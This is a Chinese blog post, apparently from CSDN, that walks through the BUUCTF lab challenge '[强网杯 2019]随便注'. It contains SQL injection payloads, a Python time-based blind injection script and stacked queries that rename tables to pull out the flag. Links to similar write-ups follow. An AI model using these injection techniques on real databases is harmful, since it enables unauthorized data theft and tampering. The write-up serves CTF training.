[强网杯 2019]随便注

最新推荐文章于 2023-10-26 10:12:27 发布
最新推荐文章于 2023-10-26 10:12:27 发布
阅读量638 收藏
点赞数
分类专栏: # buu练习记录 文章标签: 数据库 web安全 sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45925514/article/details/124757667
版权

[强网杯 2019]随便注

先用字符串类型,测试注入类型

image-20220503095130722

出现报错,说明这里是存在 字符型注入,测试万能公式

# payload
2' and '2'='2

image-20220503095212043

成功回显了,然后就是老套路,查数据库、数据表、字段名、字段值。

image-20220503095448053

出现了 正则过滤关键字,但是正则中存在一个 i 表示对查询的关键字大小写不敏感,大小写都可以被匹配到,只能使用延时注入爆破一下数据库名用户名,没什么有用的信息。

# 数据库名
import requests
import time

url = """http://f8b429df-c3d5-47e6-96a7-f81dca977300.node4.buuoj.cn:81/"""
letters = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'


def db_name(len):
	db_name = ''
	print('Task execution-------------OK!')
	for l in range(1,len+1):
		for work in letters:
			payload = """?inject=2' AND IF(substr(database(),%d,1)='%s',sleep(3),1) %%23""" %(l,work)
			#payload = url_nop(payload)
			start = time.time()
			re = requests.get( url + payload)
			end = time.time()
			if (end - start) > 3:
				db_name += work
				break
			else:
				pass
		print('db_name:{}'.format(db_name))
if __name__ == '__main__':
	db_name(10)
    
    
# 结果
Task execution-------------OK!
db_name:s
db_name:su
db_name:sup
db_name:supe
db_name:super
db_name:supers
db_name:supersq
db_name:supersql
db_name:supersqli
db_name:supersqli
[Finished in 36.0s]

对sql里面的函数不是太清楚,就会个增删改查,都被过滤了,后来看了 WriteUp 才知道用什么方法进行注入。

注入方法:堆叠注入------大佬博客

利用多条SQL语句一起执行,每条语句之间使用 ; 隔开。

?inject=2';show tables;%23

image-20220503105237883

爆出来了了两个表,查看表中的字段,发现了flag字段

?inject=2';desc `1919810931114514`;%23

# 这里为什么要加反引号呢?
# 这里的表名是数字,所以需要加上反引号
# 如果是字符串就可以不需要

?inject=2';desc words;%23

image-20220503105542803

因为 select 关键字被过滤了,不能直接查,看 大佬文章 上给出了 两种方法,一种是使用 预编译 的方法,另外一种是 修改表名,我尝试使用修改表名的方法,这种方法感觉好特别。

# payload
1';alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#

使用 or 就可以查询出flag了

# payload
?inject=1' or '1'='1

image-20220503111040039

iKnsec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[安洵杯 2019]easy_web
qq_40327508的博客
05-30 616
[安洵杯 2019]easy_web 考点:MD5强类型绕过,命令入绕过 进入发现img参数可能有任意文件下载 通过2次base64解密和一次hex转字符串 得到555.png 再通过相同的方式获取到了index.php的源码 <?php error_reporting(E_ALL || ~ E_NOTICE); header('content-type:text/html;charset=utf-8'); $cmd = $_GET['cmd']; if (!isset($_GET['img'])
【BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠入: 库:1’;show databases;# 得到数据库 表:1’;show tables;# 得到俩个表 列:1’;show columns from ‘表名’;# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
BUUCTF[强网杯 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
BUUCTF -web- [强网杯 2019]随便
qq_44640313的博客
12-14 2485
以buuctf的强网杯2019为例的堆叠
BUUCTF Web [强网杯 2019]随便
wangyuxiang946的博客
10-25 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [强网杯 2019]随便一、题目简介二、思路分析1)判断入点2)选择入方式3)查看表中内容三、解题步骤1)获取表2)获取字段3)获取表中数据四、总结 一、题目简介 进入题目链接后,是一个「查询」功能,在输入框中提交id,即可返回「响应」的内容。 在输入框中输入一个2,即可.
[强网杯 2019]随便.docx
最新发布
12-18
强网杯 2019】SQL 入详解 SQL 入是一种常见的网络安全漏洞,攻击者通过在输入参数中嵌入恶意的 SQL 代码,从而控制或篡改数据库的行为。在本题中,参赛者面对的就是一道典型的 SQL 入题目。首先,通过尝试...
强网杯 WriteUp By Nu1L
08-02
强网杯 WriteUp By Nu1L》是关于2022年第六届“强网杯”全国网络安全挑战赛的一份技术分析报告,由Nu1L团队撰写。在这篇WriteUp中,作者分享了他们在竞赛中遇到的各种挑战和解决策略,涵盖了Pwn、Reverse、Find_...
强网杯2021 Web.zip
12-17
【标题】:“强网杯2021 Web.zip”是一个与网络安全竞赛相关的压缩文件,名为“强网杯”,这通常是指“强网杯”网络安全技能大赛。该比赛是中国最高级别的网络安全竞赛之一,旨在提高参赛者的网络防御和攻防能力,...
2019 第三届强网杯线上赛.zip
12-17
强网
buuctf[强网杯 2019]随便 1(超详细,三种解法)
m0_73734159的博客
10-26 2167
网页环境判断是否是字符型入1'判断是否存在关键字过滤select联合查询被过滤,只能用堆叠入了查看有几个字段正常回显回显报错,可以看出只有两个字段查看所有数据库查看所有数据表爆words数据表的字段爆1919810931114514数据表字段(意数据表为数字的时候需要用反引号括起来);可以看到这两个表words表有两个字段,而另一个只有一个字段。
强网杯 2019]随便 【SQL入】四种解法
weixin_38832257的博客
08-17 1378
题目简介 题目名称:[强网杯 2019]随便 1 题目平台:BUUCTF 题目类型:Web 考察知识点: SQL入 解题步骤 方法一: 首先启动并访问靶机,有一个输入框,随便输入1' or 1 = 1,测试一下是否存在sql入。 提交后提示error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the
[强网杯 2019]随便 Writeup(超级详细)
StevenOnesir的博客
11-23 1096
这道题应该算是非常熟悉、经典且基础的一道题目,在攻防世界、Buu等平台上非常常见,适合作为sql入的入门学习题目。 作者说了一句:开发和安全缺一不可。这也是我想说的。 废话不多说,步入正题。 首先进入界面我们可以看到一个输入框,结合题目信息我们可以判断这就是入点。 我们先输入: 1’ 尝试一下。 果然出现了回显报错: error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your
mysql数据库show的常用命令说明
coujiongyong0208的博客
10-24 183
show columns from table_name from database_name; 或show columns from database_name.table_name; -- 显示表中列名称。 ...
[强网杯 2019]随便 (学习)记录
qq_63548648的博客
12-06 208
1
BUUCTF&[强网杯 2019]随便(细节详解WP)
Pysnow's Blog
12-09 4198
这道题通过大佬的讲解,终于把其中一些细节操作的原理给理解了一遍,我们看别人的题解,跟要知道这个题解中每一操作的原理,这对我们的提升有非常的作业
堆叠入之[强网杯 2019]随便
Aiwin的博客
05-26 692
堆叠入之[强网杯 2019]随便各详解
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iKnsec

您的鼓励,是我创作的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值